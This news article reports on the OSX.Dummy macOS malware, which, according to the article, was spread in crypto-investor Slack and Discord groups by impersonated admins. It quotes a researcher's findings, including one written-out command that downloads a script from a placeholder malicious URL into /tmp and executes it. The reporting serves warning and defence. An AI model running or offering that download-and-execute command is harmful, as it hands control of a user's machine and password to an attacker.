This Is The MacOS Cyberattack That Has Crypto Investors Crying
A MacOS-based malware called “OSX.Dummy “is reportedly being used by cybercriminals to target a group of cryptocurrency investors. Reports on the subject are stating the malware is being used to attack investors who use Slack and Discord chat platforms to conduct their crypto business. Although the malware itself is not terribly sophisticated, it paves the way for an arbitrary code infection.
Editor-in-Chief at Threatpost, Tom Spring, writes, “Hackers using MacOS malware are targeting cryptocurrency investors that use both the Slack and Discord chat platforms. The malware, dubbed OSX.Dummy, uses an unsophisticated infection method, but those who are successfully attacked open their systems up to remote arbitrary code execution.”
The malware was first detected and described by researcher Remco Verhoef, whose findings were posted in the SANS InfoSec Handlers Diary Blog. The blog post, dated June 29, states, “Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.”
The hackers behind this malware are reportedly impersonating system administrators and other popular instant messaging personalities in chat groups on Slack and Discord. They then trick legitimate users of Slack and Discord into installing harmful code. The users are enticed by these crackers to run a small script, which downloads a much larger 34MB file, which is then downloaded via the curl CLI app. This is the file that contains the malware. Remco Verhoef explains further, “Users are asked to executed a script: cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script. When the happens, a file is then downloaded by curl to /tmp/script and executed. The file is a large mach064 binary (34M), rating a perfect score of 0 / 60 on the malware detector, Virus Total. ”
Hackers ensure the new download is saved to a temporary directory because Unix permissions are not sufficient. The file, which appears to be a regular mach064 binary, executes normally to a certain degree on any MacOS system. The file also successfully hoodwinks the macOS Gatekeeper security subroutines.
Tech website Appuals.com reports, “Since it appears to be a regular mach064 binary, it can then execute normally to some degree on a macOS system. Online social malware scanning sites don’t seem to plug it as a threat just yet, which may be inadvertently helping crackers trick normal users into thinking that it’s safe. Normally, an unsigned binary file—like the one that contains OSX.Dummy—wouldn’t be able to run on the system. However, MacOS Gatekeepr security subroutines don’t check files being downloaded and run exclusively via a terminal. Since the attack vector involves the manual use of the Unix command prompt, a victim’s Macintosh is none the wiser.”
The report further states, “A call to sudo then prompts the user to enter their administration password, much as it would on GNU/Linux systems. As a result, the binary can then gain full access to a user’s underlying file system.” The malware then connects to a C2 server, and the hacker gains full control of the infected system as well as the use of OSXDummy to save the victim’s password in a temporary file for any purposes they choose.